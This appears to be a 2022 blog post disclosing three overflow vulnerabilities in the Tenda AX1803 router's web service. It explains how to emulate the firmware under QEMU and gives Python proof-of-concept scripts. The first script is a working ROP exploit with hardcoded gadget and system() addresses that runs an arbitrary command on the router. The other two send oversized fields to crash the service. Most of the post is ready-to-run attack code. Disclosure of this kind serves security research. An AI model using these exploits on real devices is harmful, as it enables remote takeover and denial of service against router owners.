Tenda ax1803 is vulnerable to a buffer overflow

Tenda ax1803 is vulnerable to a buffer overflow

Setting up the environment

   Create a br0 NIC:

sudo tunctl -t br0 -u root
sudo ifconfig br0 192.168.0.1/24

   Copy qemu-arm-static to the corresponding directory on the filesystem and start the tdhttpd service:

sudo chroot . ./qemu-arm-static ./bin/tdhttpd

The first vulnerability

   A stack overflow vulnerability exists in the fromAdvSetMacMtuWan function, which can lead to a denial of service or remote code execution vulnerability through a carefully constructed http request.

   

  The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import *

url = sys.argv[1] + "/goform/AdvSetMacMtuWan"
cmd = sys.argv[2]

libc_base = 0xfef99000
gadget1 = 0xff08dcdc # mov r0, sp ; blx r3
gadget2 = 0xff01987c # mov r3, r4 ; mov r0, r3 ; pop {r4, pc}
system_addr = 0xfefd06c8

payload = '128999999999'+ p32(system_addr) + p32(0xdeadbeef)*3 + p32(gadget2)
payload += p32(0xdeadbeef) + p32(gadget1) + cmd
payload = "wanMTU=%s&wanSpeed=0&cloneType=0&mac=00:00:00:00:00:01"%payload
content_length = len(payload)
headers = {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"http://192.168.0.1",
    "Referer":"http://192.168.0.1/main.html",
    "Content-Length":"%d"%content_length
}

r = requests.post(url,headers = headers,data = payload)

The Second vulnerability

    A heap overflow vulnerability exists in the GetParentControlInfo function, which can cause a denial of service attack through a carefully constructed http request.

     The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import *

url = sys.argv[1] + "/goform/GetParentControlInfo"

payload = 'a'*0x400
payload = 'mac=%s'%payload
content_length = len(payload)
headers = {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"%s"%url,
    "Referer":"%s/main.html"%url,
    "Content-Length":"%d"%content_length
}

r = requests.post(url,headers = headers,data = payload)

The third  vulnerability

   A heap overflow vulnerability exists in the setSchedWifi function, which could cause a denial of service by constructing an http request.

    The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import *

url = sys.argv[1] + "/goform/openSchedWifi"

payload = 'a'*0x400
payload = 'schedWifiEnable=&schedStartTime=%s&schedEndTime=&timeType=&day='%payload
content_length = len(payload)
headers = {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"%s"%url,
    "Referer":"%s/main.html"%url,
    "Content-Length":"%d"%content_length
}

r = requests.post(url,headers = headers,data = payload)

 

posted @ 2022-09-15 01:12  Riv4ille  阅读(610)  评论(0编辑  收藏  举报